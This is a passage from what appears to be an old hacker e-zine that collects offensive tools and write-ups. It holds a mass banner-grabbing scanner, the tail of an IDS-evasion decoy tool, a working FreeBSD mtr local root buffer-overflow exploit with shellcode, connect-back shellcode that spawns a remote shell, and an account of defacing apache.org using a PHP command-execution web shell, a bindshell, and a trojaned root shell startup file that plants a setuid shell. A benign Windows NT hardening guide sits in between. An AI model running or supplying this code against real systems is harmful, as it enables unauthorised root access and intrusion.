ntohl (th->seq), ntohl (th->ackseq), ntohl (ih->src),
th->syn, th->ack, th->psh, th->fin, th->rst, th->urg);
fflush (stdout);
#endif
if (th->syn)
for (i = 0; i < DECOYS; i++)
syndecoy (s);
else if ((!th->fin) && (!th->rst))
idscrew (s);
}
memset (packet, 0, 1024);
}
return 0;
}
/* $t34lthy OoOoO .
h4x3r _______( o__ o
|___\ 0|_ | _ ( _| O
/ 0|___||_O(___| ( 1 4m h1d1ng!@$ ) */
@HWA
26.0 [b0f] lscan2.c Lamerz Scan, a small fork()ing scanner..
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.. used to log bind, pop3, imap, etc banners from many
hosts quickly.
/* lscan2.c - 1999 (c) Mixter */
/* compile: gcc -O3 -s -Wall lscan2.c -o lscan */
#define INITIAL_TIMEOUT 5 // how long to wait for a connection
#define WAIT_FORK 550000 // wait 1/2 second between forks
#define BIND "ns.log"
#define POP "pop.log"
#define IMAP "imap.log"
#define RPC "mountd.log"
#define FTP "ftp.log"
#define STATUSLOG "status.log"
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <signal.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#define SSA sizeof(struct sockaddr)
#define SOX socket(AF_INET,SOCK_STREAM,0)
int s1,s2,s3,s4,s5;
int ncon(int tsock, char *ip, int port, int timeout);
void invoke(struct hostent *host, int port); // udp send
void usage(char *name, char *text); // print usage & die
int validip(char *ip); // check and correct ip address
void fchk(FILE *fp); // check a file
void timedout(int sig); // dummy function
int background(); // background a process
void scan0r(char *ip); // log services for one ip
char buf[75]; // read the first 75 chars from a server
int main(int argc,char **argv)
{
FILE *data,*err;
char ip[30];
int pid;
if((argc!=2)) usage(argv[0],"<ipfile>");
fprintf(stderr,"�[0;34mlamerz scan 1.0 by �[5mMixter�[0m\n");
fprintf(stderr,"�[0;34mscanning from %s (pid: %d)�[0m\n"
,argv[1] ,(pid=background()));
signal(SIGHUP,SIG_IGN);
signal(SIGCHLD,SIG_IGN); // zombies suck
fchk(data=fopen(argv[1],"r"));
fchk(err=fopen(STATUSLOG,"a"));
fprintf(err,"Started new session. File: %s, PID: %d\n",argv[1],pid);
while(!feof(data))
{
fscanf(data,"%s\n",ip);
if(validip(ip)==1)
{
usleep(WAIT_FORK); // wait between fork()'s (1/2 second default)
if ((pid=vfork()) < 0) { perror("fork"); exit(1); }
if (pid==0) // child
{
scan0r(ip); // collect data for this host & save into files
raise(9);
return 0;
}
}
else fprintf(err,"Invalid IP: %s\n",ip);
}
sleep(60); // wait for the last childs
fprintf(err,"Finished session. File: %s\n",argv[1]);
return 0;
}
void scan0r(char *ip)
{
int tout=INITIAL_TIMEOUT,
s1=SOX,s2=SOX,s3=SOX,s4=SOX,s5=SOX,
bind,pop,imap,rpc,ftp;
FILE *f1,*f2,*f3,*f4,*f5;
fchk(f1=fopen(BIND,"a"));
fchk(f2=fopen(POP,"a"));
fchk(f3=fopen(IMAP,"a"));
fchk(f4=fopen(RPC,"a"));
fchk(f5=fopen(FTP,"a"));
rpc=ncon(s4,ip,635,tout); // we check port 635 because 2.2b29
// mountd always binds on that one
if(rpc==-9) return; // host timed out
else if(rpc>=0) fprintf(f4,"%s\n",ip); // log mountd connect
pop=ncon(s2,ip,110,tout);
if(pop==-9) return; // host timed out
else if(pop>=0)
{
bzero(buf,sizeof(buf));
read(s2,buf,sizeof(buf)); // get popper version
fprintf(f2,"%s %s\n",ip,buf); // log popper connect
}
pop=ncon(s2,ip,109,tout);
if(pop==-9) return; // host timed out
else if(pop>=0)
{
bzero(buf,sizeof(buf));
read(s2,buf,sizeof(buf)); // get popper version
fprintf(f2,"%s !POP2! %s\n",ip,buf); // log popper connect
}
imap=ncon(s3,ip,143,tout);
if(imap==-9) return; // host timed out
else if(imap>=0)
{
bzero(buf,sizeof(buf));
read(s3,buf,sizeof(buf)); // get imap version
fprintf(f3,"%s %s\n",ip,buf); // log imap connect
}
bind=ncon(s1,ip,53,tout);
tout -= 2; // wait 2 seconds less
if(bind==-9) return; // host timed out
else if(bind>=0) // log dns connect
fprintf(f1,"%s\n",ip);
ftp=ncon(s5,ip,21,tout);
if(ftp==-9) return; // host timed out
else if(ftp>=0)
{
bzero(buf,sizeof(buf));
read(s5,buf,sizeof(buf)); // get ftp version
fprintf(f5,"%s %s\n",ip,buf); // log ftp connect
}
fclose(f1); fclose(f2); fclose(f3); fclose(f4); fclose(f5);
raise(9);
return;
}
int ncon(int tsock, char *ip, int port, int timeout) {
int probe;
struct sockaddr_in target;
target.sin_family = AF_INET;
target.sin_port = htons(port);
target.sin_addr.s_addr = inet_addr(ip);
bzero(&target.sin_zero,8);
alarm(0); signal(SIGALRM,timedout); alarm(timeout);
probe = connect(tsock, (struct sockaddr *)&target, SSA);
alarm(0);
if(probe < 0) {
close(tsock);
if(errno == EINTR) return -9;
if(errno == ETIMEDOUT) return -9;
}
return probe;
}
void usage(char *name,char *text)
{
printf("usage: %s %s\n",name,text);
exit(EXIT_FAILURE);
}
int validip(char *ip)
{
int a,b,c,d,*x;
sscanf(ip,"%d.%d.%d.%d",&a,&b,&c,&d);
x=&a;
if(*x < 0) return 0; if(*x > 255) return 0;
x=&b;
if(*x < 0) return 0; if(*x > 255) return 0;
x=&c;
if(*x < 0) return 0; if(*x > 255) return 0;
x=&d;
if(*x < 0) return 0; if(*x > 255) return 0;
sprintf(ip,"%d.%d.%d.%d",a,b,c,d); // truncate possible garbage data
return 1;
}
void fchk(FILE *fp)
{
if(fp==NULL)
{
fprintf(stderr,"Error opening file or socket.\n");
exit(EXIT_FAILURE);
}
return;
}
void timedout(int sig)
{
alarm(0);
raise(9);
}
int background()
{
int pid;
signal(SIGCHLD,SIG_IGN);
pid = fork();
if(pid<0) return -1; // fork failed
if(pid>0)
{
sleep(1);
exit(EXIT_SUCCESS); // parent, exit
}
if(pid==0)
{
signal(SIGCHLD,SIG_DFL);
return getpid(); // child, go on
}
return -2; // shouldnt happen
}
@HWA
27.0 [b0f] Pseudo Cryptographic Filesystem..
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.. Creates a fake CFS directory that is indistinguishable from real ones
/*
* pcfs - pseudo cryptographic file system
* (c) 2000 by Mixter
*
* This tool just creates a recursive directory and file structure
* that contains purely random data, but is indistinguishable from a
* encrypted CFS directory, unless an extensive cryptanalysis is performed.
* This can be taken as a proof that a strange directory cannot easily be
* proven to actually contain encrypted data. May be useful against f3dz,
* just for decoy purposes, or to keep people from analyzing your
* cryptographic file systems structure. Distributed according to the GPL.
*
* WARNING: THIS PROGRAM IS SUBJECT TO PSEUDO-CRYPTOGRAPHIC EXPORT
* CONTROLS AND US-RESTRICTIONS AGAINST RANDOM DATA! =P
* This code was reviewed and approved by the SCC (sloppy code commission)
* gcc -Wall -O2 pcfs.c -o pcfs
*/
#include <stdio.h>
#include <string.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#define START_PATH "fake"
mode_t modes[7] =
{00755, 00644, 0000, 00664, 00700, 00777, 00444};
char chr[16] = "abcdef1234567890", rseed[65535], buffer[256];
char wd[200];
int rcounter = 0;
void random_init (void);
inline long gr (int, int);
char *rname (void);
mode_t rmode (void);
void mkfiles (void);
void mkd (char *, int);
int
main (void)
{
printf ("Creating fake file system in %s/%s, press a key\n",
getcwd (wd, 200), START_PATH);
(void) getchar ();
printf ("Hit CTRL+C to stop - creating files");
if (!geteuid ())
setpriority (PRIO_PROCESS, 0, -10);
mkd (START_PATH, 0);
return 0;
}
void
mkd (char *dirname, int forking)
{
printf (".");
fflush (stdout);
if (forking)
if (fork ())
return;
mkdir (dirname, rmode ());
getcwd (wd, 200);
strcat (wd, "/");
strcat (wd, dirname);
chdir (wd);
if (forking)
mkfiles ();
else
{
char smbuf[32];
int a, f = open ("/dev/urandom", O_RDONLY);
read (f, smbuf, 32);
a = open ("...", O_WRONLY | O_CREAT | O_TRUNC, 00644); /* hash */
write (a, smbuf, gr (5, 10));
close (a);
sprintf (smbuf, "%ld", gr (1, 5));
a = open ("..c", O_WRONLY | O_CREAT | O_TRUNC, 00644); /* algorithm */
write (a, smbuf, strlen(smbuf));
close (a);
read (f, smbuf, 32);
a = open ("..k", O_WRONLY | O_CREAT | O_TRUNC, 00644); /* encrypted key */
write (a, smbuf, 32);
close (a);
close (f);
sprintf (smbuf, "%ld", gr (1000, 900000));
a = open ("..s", O_WRONLY | O_CREAT | O_TRUNC, 00644); /* session blah */
write (a, smbuf, strlen(smbuf));
close (a);
while (1)
mkfiles ();
}
}
void
mkfiles (void)
{
while (gr (0, 25))
if (!gr (0, 10))
mkd (rname (), 1);
else
{
int f = open ("/dev/urandom", O_RDONLY), x, y = gr (0, 65500);
char fname[256], fn2[256], big[65535];
memset (fname, 0, 256);
memset (fn2, 0, 256);
sprintf (fname, "%s", rname ());
sprintf (fn2, ".pvect_%s", rname ());
symlink (fname, fn2);
x = open (fname, O_RDWR | O_CREAT, rmode());
read (f, big, y);
write (x, big, y);
close (f);
close (x);
}
}
char *
rname (void)
{
int i;
memset (buffer, 0, 256);
for (i = 0; i < gr (5, 150); i++)
buffer[i] = chr[gr (0, 15)];
return buffer;
}
mode_t
rmode (void)
{
return (modes[gr (0, 6)]);
}
void
random_init (void)
{
int rfd = open ("/dev/urandom", O_RDONLY);
if (rfd < 0)
rfd = open ("/dev/random", O_RDONLY);
rcounter = read (rfd, rseed, 65535);
close (rfd);
}
inline
long
gr (int min, int max)
{
if (rcounter < 2)
random_init ();
srand (rseed[rcounter] + (rseed[rcounter - 1] << 8));
rcounter -= 2;
return ((random () % (int) (((max) + 1) - (min))) + (min));
}
@HWA
28.0 [b0f] mtr-0.41 (freebsd) local root exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/* mtr-0.41 (freebsd) local root exploit */
/* (c) 2000 babcia padlina / buffer0verfl0w security (www.b0f.com) */
#include <stdio.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <string.h>
#define NOP 0x90
#define BUFSIZE 10000
#define ADDRS 1200
long getesp(void)
{
__asm__("movl %esp, %eax\n");
}
int main(argc, argv)
int argc;
char **argv;
{
char *execshell =
//seteuid(0);
"\x31\xdb\xb8\xb7\xaa\xaa\xaa\x25\xb7\x55\x55\x55\x53\x53\xcd\x80"
//setuid(0);
"\x31\xdb\xb8\x17\xaa\xaa\xaa\x25\x17\x55\x55\x55\x53\x53\xcd\x80"
//execl("/bin/sh", "sh", 0);
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
char buf[BUFSIZE+ADDRS+1], *p;
int noplen, i, ofs;
long ret, *ap;
if (argc < 2)
{
fprintf(stderr, "usage: %s ofs\nusually offset = 4000\n",
argv[0]);
exit(0);
}
ofs = atoi(argv[1]);
noplen = BUFSIZE - strlen(execshell);
ret = getesp() + ofs;
memset(buf, NOP, noplen);
buf[noplen+1] = '\0';
strcat(buf, execshell);
setenv("EGG", buf, 1);
p = buf;
ap = (unsigned long *)p;
for(i = 0; i < ADDRS / 4; i++)
*ap++ = ret;
p = (char *)ap;
*p = '\0';
fprintf(stderr, "ret: 0x%x\n", ret);
setenv("TERMCAP", buf, 1);
execl("/usr/local/sbin/mtr", "mtr", 0);
return 0;
}
@HWA
29.0 [b0f] shellcode that connets to a host&port and starts a shell
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/*
Connecting shellcode written by lamagra <access-granted@geocities.com>
lamagra is a member of b0f/buffer0verfl0w security
http://lamagra.seKure.de - http://www.b0f.com
file "connect"
version "01.01"
text
.align 4
_start:
#socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
movl %esp,%ebp
xorl %edx,%edx
movb $102,%edx
movl %edx,%eax # 102 = socketcall
xorl %ecx,%ecx
movl %ecx,%ebx
incl %ebx # socket()
movl %ebx, -8(%ebp) # 1 = SOCK_STREAM
incl %ebx
movl %ebx, -12(%ebp) # 2 = AF_INET
decl %ebx # 1 = SYS_socket
movl %ecx, -4(%ebp) # 0 = IPPROTO_IP
leal -12(%ebp),%ecx # put args in correct place
int $0x80 # switch to kernel-mode
xorl %ecx,%ecx
movl %eax,-12(%ebp) # save the fd
# connect(fd,(struct sockaddr *)&struct,16);
incl %ebx
movw %ebx,-20(%ebp) # 2 = PF_INET
movw $9999,-18(%ebp) # 9999 = htons(3879);
movl $0x100007f,-16(%ebp) # htonl(IP)
leal -20(%ebp),%eax # struct sockaddr
movl %eax,-8(%ebp) # load the struct
movb $16,-4(%ebp) # 16 = sizeof(sockaddr)
movl %edx,%eax # 102 = socketcall
incl %ebx # 3 = SYS_connect
leal -12(%ebp),%ecx # put args in place
int $0x80 # call socketcall()
# dup2(fd,0)
xorl %ecx,%ecx
movb $63,%edx # 63 = dup2()
movl %edx,%eax
int $0x80
#dup2(fd,1)
movl %edx,%eax
incl %ecx
int $0x80
# arg[0] = "/bin/sh"
# arg[1] = 0x0
# execve(arg[0],arg);
jmp 0x18
popl %esi
movl %esi,0x8(%ebp)
xorl %eax,%eax
movb %eax,0x7(%esi)
movl %eax,0xc(%ebp)
movb $0xb,%al
movl %esi,%ebx
leal 0x8(%ebp),%ecx
leal 0xc(%ebp),%edx
int $0x80
call -0x1d
.string "/bin/sh"
*/
char code[]=
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee"
"\x0f\x27" // <-- port to connect to
"\xc7\x45\xf0"
"\x7f\x00\x00\x01" // <-- host to connect to
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0"
"\x43\x8d\x4d\xf4\xcd\x80\x31\xc9\xb2\x3f\x89\xd0\xcd\x80\x89\xd0"
"\x41\xcd\x80\xeb\x18\x5e\x89\x75\x08\x31\xc0\x88\x46\x07\x89\x45"
"\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08\x8d\x55\x0c\xcd\x80\xe8\xe3\xff"
"\xff\xff/bin/sh";
#define NAME "connecting"
main()
{
int (*funct)();
funct = (int (*)()) code;
printf("%s shellcode\n\tSize = %d\n",NAME,strlen(code));
(int)(*funct)();
}
@HWA
30.0 [b0f] NT Security check paper part 2 by Slash
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
For buffer0verfl0w security
written by slash
tcsh@b0f.i-p.com
http://www.b0f.com
Windows NT Security Check Part II
=================================
Introduction
------------
In Part I of "Windows NT security Check" I explained some basic things about User accounts
and Logging options. In this part I'll try to explain varius Groups and User rights. Please
note that any of the topics provided in these articles can be discussed on our webboard
located at http://net-security.org/webboard.htm
Groups
------
The membership of groups should be carefully evaluated. A group that is granted
permissions to sensitive files might contain users that should not have that access.
Open each group listed in the User Manager and inspect its members.
- Carefully evaluate the members of management groups such as Administrators, Server
Operators, Account Operators, Backup Operators, and Print Operators. Remove all
unnecessary accounts.
- Make sure that all administrative users have two accounts: one for administrative
tasks and one for regular use. Administrators should only use their administrative
accounts when absolutely necessary.
- Evaluate each global group membership and the resources that the group has access to.
Does the group have access in other domains?
- What folders and files do groups have permission to access?
- Do local groups hold global groups from other domains? Check the membership of these
global groups and make sure that no users have unnecessary access to resources in the
current domain
The Administrator Account and Administrators Group
--------------------------------------------------
The Administrator account and Administrators group have unlimited rights on the system.
Therefore, you need to carefully evaluate the membership of the Administrators group
and take care of some other housekeeping related to the Administrator account:
- If you are taking over the management of an existing system, you should change the
Administrator account name and password immediately. You do not know who might have a
password that would give them access to the account.
- The Administrator account is often the target of attacks because of its well-known name.
You should rename the Administrator account to an obscure name and create a "decoy"
account called "Administrator" with no permissions. Intruders will attempt to break in
to this decoy account instead of the real account.
- Enable failed logons in the auditing system to detect attempts to log on to any account,
including Administrator.
- Look for unnecessary accounts that have Administrator status. Perhaps an intruder has
created such an account as a backdoor into the system.
The Administrators group has "Access this computer from network" right, which you can
block to prevent account hijacking or unauthorized activities. Without this right,
administrators must log on at the computer itself in a controlled environment to do any
administrative tasks. You will also need to remove the right from the Everyone group then
add back in accounts that are allowed to log on from network.
The Guest Account and Everyone Group
------------------------------------
Most administrators agree that it should be disabled, although removing it remove the
ability of anonymous users to access a system. If You decide to enable guest account
consider creating a separate domain for these public services where the Guest account
is enabled. Alternatively, use a Web server for this type of system.
- Users who log on as guests can access any shared folder that the Everyone group has
access to (i.e., if the Everyone group has Read permissions to the Private folder,
guests can access it with Read permissions).
- You don't know who Guest users are and there is no accountability because all guests
log in to the same account.
- If you have Microsoft Internet Information Server software installed, a special Guest
account called IUSR_computername exists with the rights to log on locally. Remove this
account if you don't want the general public to access your Web server. Users must then
have an account to access the Web server.
User rights
-----------
In the User Manager for Domains, check the rights that users and groups have on the
system. Choose User Rights from the Policies menu to display the User Rights Policy
dialog box. Initially, the box shows the basic rights. To evaluate all rights, click the
Show Advanced User Rights option. Here are some considerations for basic rights:
- Access this computer from the network
By default, only the Administrators and the Everyone group have this right. Remove
the Everyone group (why would you want everyone to access this server from the network
if you are interested in security?), then add specific groups as appropriate. For
example, create a new group called "Network Users" with this right, then add users who
should have network access.
- Backup files and directories
User's with this right can potentially carry any files off-site. Carefully evaluate which
users and groups have this right. Also evaluate the Restore files and directories right.
- Log on locally
For servers, only administrators should have this right. No regular user ever needs
to logon directly to the server itself. By default, the administrative groups
(Administrators, Server Manager, etc.) have this right. Make sure that any user who is
a member of these groups has a separate management account.
- Manage auditing and security logs
Only the Administrators group should have this right.
- Take ownership of files or other objects
Only the Administrators group should have this right.
Scan all the advanced rights to make sure that a user has not been granted rights
inappropriately.
Files, Folders, Permissions and Shares
--------------------------------------
This discussion assumes that you are only using NTFS volumes on your servers. Do not
use FAT volumes in secure installations.
To check permissions on folders and other resources, you must go to each resource
individually to review which users and groups have permissions. This can be a
bewildering task, so for large systems obtain a copy of the Somarsoft DumpACL utility.
To open the Permissions dialog box for a folder or file, right-click it and choose
Properties, then click either the Sharing or the Security tab. The Sharing options
show who has access to the folder over the network. The Security tab has the Permission
and Auditing buttons so you can check local permissions or set auditing options.
Start your evaluation with the most sensitive and critical folders if you are doing
this procedure manually or performing a periodic checkup. Take care to do the following:
- Check each folder and/or file to determine which local users and groups have access
and whether that access is appropriate.
- Check all shared folders and the share permissions
on those folders to determine which network users and groups have access and whether
that access is appropriate.
- Program files and data files should be kept in separate folders to make management
and permission setting easier. Also, if users can copy files into a data folder,
remove the Execute permission on the folder to prevent someone from copying and
executing a virus or Trojan Horse program.
- Separate public files from private files so you can apply different permission sets.
- If users or groups have access to a folder, should they have the same access to
every file in the folder? To every subdirectory? Check the sensitivity of files and
attached subdirectories to evaluate whether inherited permissions are appropriate.
- Keep in mind that the Everyone group gets Full access by default for all new folders
you create. To prevent this, change the Everyone group's permission for a folder,
then any new subdirectories you create will get the new permission settings.
- If the server is connected to an untrusted network such as the Internet, do not
store any files on the server that are sensitive and for in-house access only.
- Never share the root directory of a drive or one of the drive icons that appears in the
graphical display. An exception would be sharing a Read Only CD-ROM drive for public
access.
- For sensitive, password protected directories, enable Auditing. Right-click a folder,
click Security, then click Auditing and enable Failure to track users that are attempting
unauthorized access a folder or file. Note that File and Object access must be enabled
from the Audit Policies menu in the User Manager, as described later.
- Use encryption wherever possible to hide and protect files. Mergent
(http://www.mergent.com/) and RSA Data Systems (http://www.rsa.com/) provide encryption
software for this purpose.
You can remove Everyone's access to an entire folder tree by going to the root of the
drive, changing the permissions, and propagating those permissions to subdirectories.
Do not do this for the systemroot folder (usually C:\WINNT). You must manually update
Everyone's right there.
Virus and Trojan Horse Controls
-------------------------------
Viruses are a particularly serious problem in the network environment because the client
computer can become infected, transferring the virus to server systems. Other users may come
into contact with infected files at the server. Evaluate and set the following options:
- Program directories should have permissions set to Read and Execute (not Write) to
prevent a virus from being written into a directory where it can be executed. To install
programs, temporarily set Write on, then remove it.
- Install new software on a separate, quarantined system for a test period, then install
the software on working systems once you have determined that it is safe to run.
- Public file sharing directories should have the least permissions possible, i.e., Read
Only, to prevent virus infections.
- If a user needs to put files on your server, create a "drop box" directory that has
only the Write permission. Check all new files placed in this directory with a virus
scanner. Implement backup policies and other protective measures.
- Educate and train users.
- Check the Symantec (<http://www.symantec.com/>) site for interesting papers on
Windows NT-specific virus issues.
Auditing and Event Logs
-----------------------
Check the status of audit settings by choosing Audit on the Policies menu in the User
Manager for Domains. The Audit Policy dialog box appears. The settings in this box reflect
the minimum settings that are appropriate for auditing in most environments. Keep in mind
that auditing too many events can affect a system's performance.
Protect auditing and security logs from other administrators who might change or delete
them. You can grant only the Administrators group the ability to access the logs. To
restrict access to only one user (the "auditor"), remove all users except the auditor
from the Administrators group. This means all of your other administrators should be
members of a management group that does not have the "Manage auditing and security log"
right.
Check for failed logons in the Event Viewer. You can enable security auditing for logon
attempts, file and object access, use of user rights, account manage- ment, security
policy changes, restart and shutdown, and process tracking.
Backup
------
Backup policies and procedures are essential. In your evaluation, determine which users
belong to the Backup Operators group. Carefully evaluate if you trust these users. Backup
operators have the ability to access all areas of the system to back up and restore files.
Members of the Backup Operators group should have special logon accounts (not regular user a
ccounts) on which you can set logon restrictions. If Joe is the backup operator, he should
have a regular logon account for his personal activities and a special logon account for
backing up the system. Set restrictions on the backup account, then set restrictions that
force Joe to log on from a specific system only during appropriate hours. Change, with
frequency, the name and password of the account to guard against hijacking.
- Review the backup policies. Is the backup schedule appropriate? Are files safely
transported to secure backup locations? How might backup compromise the confidentiality
of files?
- View the Event Log to audit backup activities.
Final conclusion
----------------
Well, I hope that this articles gave You some basic info how to administrate Youre Windows NT
server. For more info I recomend reading the following books:
- Inside Windows NT Server 4 : Administrators Resource Edition
<http://www.amazon.com/exec/obidos/ASIN/1562057278/netsecurity>
This national bestseller has been updated and expanded to cover the most talked-about
Windows NT-related technologies and the latest information on Windows NT Server 4. Aimed
at network administrators, consultants, and IT professionals, this book provides invaluable
information to help you get up and running. Written by experts, this comprehensive book
takes you through the ins and outs of installing, managing, and supporting a Windows NT
network - with efficiency. Loaded with tutorials and organized as a reference, it's the
perfect resource for new administrators who need to get up to speed quickly, as well as
technically savvy and experienced administrators who just need to locate the most essential
information - without reading every page.
- Essential Windows NT System Administration
<http://www.amazon.com/exec/obidos/ASIN/1565922743/netsecurity>
Essential Windows NT System Administration helps you manage Windows NT systems as
productively as possible, making the task as pleasant and satisfying as can be. It
combines practical experience with technical expertise, helping you to work smarter
and more efficiently. It covers not only the standard utilities offered with the Windows
NT operating system, but also those from the Resource Kit, as well as important commercial
and free third-party tools. It also pays particular attention to developing your own
tools by writing scripts in Perl and other languages to automate common tasks. This book
covers the workstation and server versions of Windows NT 4 on both Intel and Alpha
processor-based systems.
- Microsoft Windows NT 4.0 Security, Audit, and Control
<http://www.amazon.com/exec/obidos/ASIN/157231818X/netsecurity>
This "Security Handbook" is the official guide to enterprise-level security on networks
running Microsoft Windows NT Server 4.0 Written in collaboration between Microsoft and
MIS professionals at Coopers & Lybrand, here is the essential reference for any Windows
NT Server 4.0-based network.
This is only a small amount of book concerning Windows NT security and administration. You
can find more books on Windows NT at our online bookstore <http://net-security.org/books/>
Default newsletter (http://default.net-security.org)
@HWA
31.0 [IND] The apache.org hack. by {} and Hardbeat (Apr 4th 2000)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
How we defaced www.apache.org
by {} and Hardbeat
/*
* Before you start reading
*/
This paper does _not_ uncover any new vulnerabilities. It points out common
(and slightly less common) configuration errors, which even the people at
apache.org made. This is a general warning. Learn from it. Fix your systems,
so we won't have to :)
/*
* introduction
*/
This paper describes how, over the course of a week, we succeeded in
getting root access to the machine running www.apache.org, and changed
the main page to show a 'Powered by Microsoft BackOffice' logo instead
of the default 'Powered by Apache' logo (the feather). No other changes
were made, except to prevent other (possibly malicious) people getting in.
Note that the problems described in this paper are not apache-related,
these were all config errors (one of 'm straight from BugZilla's README,
but the README had enough warnings so I don't blame the BugZilla developers).
People running apache httpd do not need to start worrying because of
anything uncovered herein.
We hacked www.apache.org because there are a lot of servers running apache
software and if www.apache.org got compromised, somebody could backdoor
the apache server source and end up having lots of owned boxes.
We just couldn't allow this to happen, we secured the main ftproot==wwwroot
thing. While having owned root we just couldnt stand the urge to put that
small logo on it.
/*
* ftproot == wwwroot
* o+w dirs
*/
While searching for the laters apache httpserver to diff it the with
previous version and read that diff file for any options of new buffer
overflows, we got ourselves to ftp://ftp.apache.org. We found a mapping of
the http://www.apache.org on that ftp including world writable directories.
So we wrote a little wuh.php3 including
<?
passthru($cmd);
?>
and uploaded that to one of the world writable directories.
/*
* Our commands executed
*/
Unsurprisingly, 'id' got executed when called like
http://www.apache.org/thatdir/wuh.php3?cmd=id
Next was to upload some bindshell and compile it like calling
http://www.apache.org/thatdir/wuh.php3?cmd=gcc+-o+httpd+httpd.c and then
executing it like calling http://www.apache.org/thatdir/wuh.php3?cmd=./httpd
/*
* The shell
*/
Ofcourse we used a bindshell that first requires ppl to authenticate with
a hardcoded password (:
Now we telnet to port 65533 where we binded that shell and we have local
nobody access, because cgi is running as user nobody.
/*
* The apache.org box
*/
What did we find on apache.org box:
-o=rx /root
-o=rx homedirs
apache.org is a freebsd 3.4 box. We didn't wanted to use any buffer
overflow or some lame exploit, goal was to reach root with only
configuration faults.
/*
* Mysql
*/
After a long search we found out that mysql was
running as user root and was reachable locally. Because apache.org was
running bugzilla which requires a mysql account and has it
username/password plaintext in the bugzilla source it was easy to
get a username/passwd for the mysql database.
We downloaded nportredird and have it set up to accept connections on
port 23306 from our ips and redir them to localhost port 3306 so we could
use our own mysql clients.
/*
* Full mysql access
* use it to create files
*/
Having gained access to port 3306 coming from localhost, using the login
'bugs' (which had full access [as in "all Y's"]), our privs where
elevated substantially. This was mostly due to sloppy reading of the BugZilla
README which _does_ show a quick way to set things up (with all Y's) but
also has lots of security warnings, including "don't run mysqld as root".
Using 'SELECT ... INTO OUTFILE;' we were now able to create files
anywhere, as root. These files were mode 666, and we could not overwrite
anything. Still, this seemed useful.
But what do you do with this ability? No use writing .rhosts files - no
sane rshd will accept a world-writable .rhosts file. Besides, rshd
wasn't running on this box.
/*
* our /root/.tcshrc
*/
Therefore, we decided to perform a trojan-like trick. We used database
'test' and created a one-column table with a 80char textfield. A couple
of inserts and one select later, we had ourselves a /root/.tcshrc with
contents similar to:
#!/bin/sh
cp /bin/sh /tmp/.rootsh
chmod 4755 /tmp/.rootsh
rm -f /root/.tcshrc
/*
* ROOT!!
*/
Quite trivial. Now the wait was for somebody to su -. Luckily, with 9
people legally having root, this didn't take long. The rest is trivial
too - being root the deface was quickly done, but not until after a
short report listing the vulnerabilities and quick fixes was build.
Shortly after the deface, we sent this report to one of the admins.
/*
* Fix that ftproot==wwwroot
*/
Another thing we did before the deface, was creating a file 'ftproot' in
the wwwroot (which was also ftproot), moving 'dist' to 'ftproot/dist'
and changing the ftproot to this new 'ftproot' dir, yielding the
world-writable dirs unexploitable but allowing ftp URLs to continue
working.
/*
* What could have been compromised?
*/
Remember the trojaned tcp_wrappers on ftp.win.tue.nl last year? If we
wanted to, we could have done the same thing to Apache. Edit the source
and have people download trojaned versions. Scary, eh?
/*
* In short:
*/
- ftproot==webroot, worldwritable dirs allowing us to upload and execute
php3 scripts
- mysqld running as root, with a FULL RIGHTS login without a password.
/*
* Compliments for the Apache admin team
*/
We would like to compliment the Apache admin team on their swift
response when they found out about the deface, and also on their
approach, even calling us 'white hats' (we were at the most 'grey hats'
here, if you ask us).
Regards,
{} and Hardbeat.
{} (mailto:karin@root66.nl.eu.org) is part of
RooT66 - http://root66.nl.eu.org
ShellOracle - http://www.shelloracle.cjb.net
b0f - http://b0f.freebsd.lublin.pl
Hardbeat (petervd@vuurwerk.nl) just has a lame page at
http://www.dataloss.net/
In the media:
~~~~~~~~~~~~
Wired;
http://www.wired.com/news/politics/0,1283,36170,00.html
Apache Site Defaced by Michelle Finley
4:00 p.m. May. 5, 2000 PDT
While the rest of the world battled the "Love Bug" worm, free Web-server
software-provider Apache had problems of its own.
Due to system-level misconfigurations of ftpd and bugzilla, a hacker was
able to obtain a shell account and replace Apache's logo of a feather and
its "Powered by Apache" tagline with a Microsoft logo and credit.
"Yes, the www.apache.org site was penetrated," said Ken Coar, a director
and vice president of the Apache Software Foundation. "The penetration was
through some network services that were configured with an insufficient
degree of paranoia. The penetration was not through the Apache Web server
software nor any of the other Apache software, but through standard
network utilities found on virtually all Internet servers."
The people who penetrated the Apache.org system likely were "grey hats,"
Coar said. The hacker spectrum runs from "black hats," who would break in,
do damage, and attempt to avoid tracing, to "white hats," who would note
the configuration problems and let the site managers know about them
without taking advantage of them.
"These people fall into the 'grey area' in between because they told us
about the problems, but not until after they had utilized them to make
some apparently innocuous changes," he said.
Cruciphux, publisher of the security and hacking electronic zine
